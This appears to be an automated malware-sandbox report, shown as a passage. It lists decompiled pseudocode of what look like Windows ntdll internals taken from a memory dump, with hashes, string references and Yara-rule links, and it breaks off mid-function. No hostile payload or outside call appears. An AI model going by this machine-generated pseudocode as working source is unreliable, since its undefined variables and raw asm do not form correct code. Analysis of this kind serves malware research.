API String ID: 2994545307-2202222882
Opcode ID: b2e4d8698a8e637af8a9c3cd6faf071d642c6e5bbc2b746ac3e79f0172a4767c
Instruction ID: 9dfd19b6cb3a2ea9f4e1852e0ff57239455686aec84b7415fa9e336704a066c3
Opcode Fuzzy Hash: b2e4d8698a8e637af8a9c3cd6faf071d642c6e5bbc2b746ac3e79f0172a4767c
Instruction Fuzzy Hash: 7C4130F290052D9BDB21DB50DC84FEEB77DAB45714F0045E5AA19AB280DB709F88CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05103884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05103884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E050C9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L050A4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E050C9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x05103893
0x05103896
0x05103899
0x0510389f
0x051038a0
0x051038a4
0x051038a9
0x051038ac
0x051038ad
0x051038ae
0x051038af
0x051038b1
0x051038b4
0x051038bb
0x051038bc
0x051038bd
0x051038c4
0x051038c8
0x051038ca
0x051038ca
0x051038d5
0x0510393e
0x05103940
0x05103942
0x05103952
0x05103954
0x05103961
0x05103961
0x05103967
0x0510396e
0x0510396e
0x05103947
0x0510394c
0x00000000
0x0510394c
0x051038ea
0x051038ee
0x051038f8
0x051038f9
0x051038ff
0x05103900
0x05103902
0x05103903
0x0510390b
0x0510390f
0x05103950
0x00000000
0x05103950
0x05103915
0x0510391d
0x0510391d
0x05103922
0x05103926
0x00000000
0x05103928
0x0510392b
0x0510392b
0x05103935
0x05103937
0x05103937
0x00000000
0x05103935
0x05103926
0x051038f0
0x00000000

Strings

BinaryName, xrefs: 051038B4

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 9677c270da8cf28aa2c8d103e1dc21e35728b6d76fb3af9466105e5aec5b3517
Instruction ID: ba1bca695b394f508948e735eccfb20e776151e56e9a2957f8b79b82807d10a3
Opcode Fuzzy Hash: 9677c270da8cf28aa2c8d103e1dc21e35728b6d76fb3af9466105e5aec5b3517
Instruction Fuzzy Hash: 27310332D04509AFDF25DB58C945EBFB775FB80B20F024969E925A72C0D7B09E00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 050BD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E050BD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x517d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E050A4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E050CB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E050C98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E050C95D0();
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x050bd29c
0x050bd2a6
0x050bd2b1
0x050bd2b5
0x050bd2b6
0x050bd2bc
0x050bd2bd
0x050bd2be
0x050bd2bf
0x050bd2c2
0x050bd2c4
0x050bd2cc
0x050bd384
0x050bd34b
0x050bd34f
0x050bd350
0x050bd351
0x050bd35c
0x050bd35c
0x050bd2d6
0x050bd2da
0x050bd2e1
0x050bd361
0x050bd369
0x050bd36d
0x050bd2e3
0x050bd2e3
0x050bd2e3
0x050bd2e5
0x050bd2ed
0x050bd2f5
0x050bd2fa
0x050bd302
0x050bd303
0x050bd30b
0x050bd30f
0x050bd313
0x050bd318
0x050bd31c
0x050bd320
0x050bd379
0x050bd37d
0x00000000
0x00000000
0x050faffe
0x050fb001
0x050fb011
0x00000000
0x050bd322
0x050bd322
0x050bd330
0x050bd337
0x050bd35d
0x050bd339
0x050bd33f
0x050bd38c
0x050bd38c
0x050bd33f
0x050bd349
0x00000000
0x050bd349

Strings

@, xrefs: 050BD303

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9e9063d7818d9d5ad8b9491899f0e4dfc985d5f38b66b392cd6de2b791a63fec
Instruction ID: 0b495af221cf4a06af2389c1d5620e57ea951e1e1c4e1758f85367092ee918bd
Opcode Fuzzy Hash: 9e9063d7818d9d5ad8b9491899f0e4dfc985d5f38b66b392cd6de2b791a63fec
Instruction Fuzzy Hash: C731A1B26083059FD361DF28E9C0AAFFBE9FB95A54F000A2EF58583211D675DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05091B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05091B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E050CBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E050CA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E050CA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L050A4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x05091b8f
0x05091b9a
0x05091b9c
0x05091b9e
0x05091ba3
0x050e7010
0x050e7010
0x00000000
0x05091ba9
0x05091ba9
0x05091bae
0x00000000
0x05091bc5
0x05091bca
0x05091bcf
0x05091bd0
0x05091bd1
0x05091bd2
0x05091bd6
0x05091bdc
0x05091be0
0x050e6ffc
0x050e7000
0x00000000
0x050e7006
0x050e7009
0x050e7009
0x05091be6
0x05091bec
0x05091c0b
0x05091c0b
0x05091c0c
0x05091c11
0x05091c12
0x05091c15
0x05091c1b
0x05091c1f
0x05091c31
0x05091c33
0x050e7026
0x050e7026
0x05091c21
0x05091c24
0x05091c24
0x05091bee
0x05091bee
0x05091bf2
0x05091c3a
0x05091bf4
0x05091bf4
0x05091c05
0x05091c05
0x05091c09
0x05091c3e
0x00000000
0x00000000
0x00000000
0x05091c09
0x05091bec
0x05091be0
0x05091bae
0x05091c2e

Strings

WindowsExcludedProcs, xrefs: 05091BC5

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: e99d024a42cdee66e7630f76b0bf1ee315bb83d3284ae0322e4c2096e8040199
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 562103B6701229ABCF26DA55B844FAFB7AEEB81650F154425F9158B208D630DD01E7E0

Uniqueness

Uniqueness Score: -1.00%

Function 050AF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050AF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x050af71d
0x050af722
0x050af726
0x050f4770
0x050af765
0x050af769
0x050af769
0x050af732
0x050f477a
0x00000000
0x050f477a
0x050af738
0x050af73a
0x050af73c
0x050af73f
0x050af746
0x050af778
0x050af7a9
0x050af7a9
0x050af754
0x050af75a
0x050af75d
0x050af75f
0x050af761
0x050af76f
0x050af771
0x050af771
0x050af76f
0x050af763
0x00000000
0x050af763
0x050af77d
0x050af7a3
0x050af7a5
0x00000000
0x050af7a5
0x050af77f
0x050af782
0x050af784
0x050af786
0x00000000
0x00000000
0x00000000
0x050af788
0x050af748
0x050af74d
0x050af78d
0x050af793
0x050af7b7
0x050af7bc
0x00000000
0x050af7bc
0x050af798
0x00000000
0x00000000
0x050af79d
0x050af7b0
0x00000000
0x050af7b0
0x050af79f
0x00000000
0x050af74f
0x050af74f
0x00000000
0x050af74f

Strings

Actx , xrefs: 050AF73F

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 45769d18715f1f6a5f16c545771ca723e6444bce4442ffdd37d2d6efab9c935a
Instruction ID: d7e7b9afeb1843cc2bea37c9ba47165e352555bce30d98e64d701e227a289d8e
Opcode Fuzzy Hash: 45769d18715f1f6a5f16c545771ca723e6444bce4442ffdd37d2d6efab9c935a
Instruction Fuzzy Hash: 6511933F3087538BEBB68E9DB79073E72D7BB85664F24452AE462CB391DA70D8408340

Uniqueness

Uniqueness Score: -1.00%

Function 05138DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E05138DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5160d50);
				E050DD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05115720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L050DDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L050DDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E050DD130(_t34, _t39, _t40);
			}

0x05138df1
0x05138df1
0x05138df1
0x05138df1
0x05138df1
0x05138df1
0x05138df3
0x05138df8
0x05138dfd
0x05138e00
0x05138e0e
0x05138e2a
0x05138e36
0x05138e38
0x05138e3c
0x05138e46
0x05138e46
0x05138e36
0x05138e50
0x05138e56
0x05138e59
0x05138e5c
0x05138e60
0x05138e67
0x05138e6d
0x05138e73
0x05138e74
0x05138eb1
0x05138ebd

Strings

Critical error detected %lx, xrefs: 05138E21

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 9f433b3b68ae7e84cfae9bb2618e9789d38fa0cb2a8678b778d2bebccaa31e91
Instruction ID: 141e07995c3d162411836c1b3eeef0e49eed61f9df5a583e5c1a7fd89fd54e99
Opcode Fuzzy Hash: 9f433b3b68ae7e84cfae9bb2618e9789d38fa0cb2a8678b778d2bebccaa31e91
Instruction Fuzzy Hash: A3115B76D55348EADF25DFA8950A7DCBBB1BB04314F24426DE5296B282C3340645CF24

Uniqueness

Uniqueness Score: -1.00%

Function 0511FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0511FF60

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: a3cb87b5bf4edb5373863e0c20cef120ac0d854dc64528cf6cc2a02e63a97766
Instruction ID: faa070577e91c0f30d9df249078fd7be9cd62122e4a8eb63993954bfd10c9d7e
Opcode Fuzzy Hash: a3cb87b5bf4edb5373863e0c20cef120ac0d854dc64528cf6cc2a02e63a97766
Instruction Fuzzy Hash: 78110476A50688EFDB12DB50C949FDCBBB2FF08704F1480A4F5096B1A1C77C9941DB64

Uniqueness

Uniqueness Score: -1.00%

Function 05155BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E05155BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5161178);
				E050DD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05154C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E050CD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05155542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x51760e8;
								if( *0x51760e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x51760e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E050C9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E050C6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E050CF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
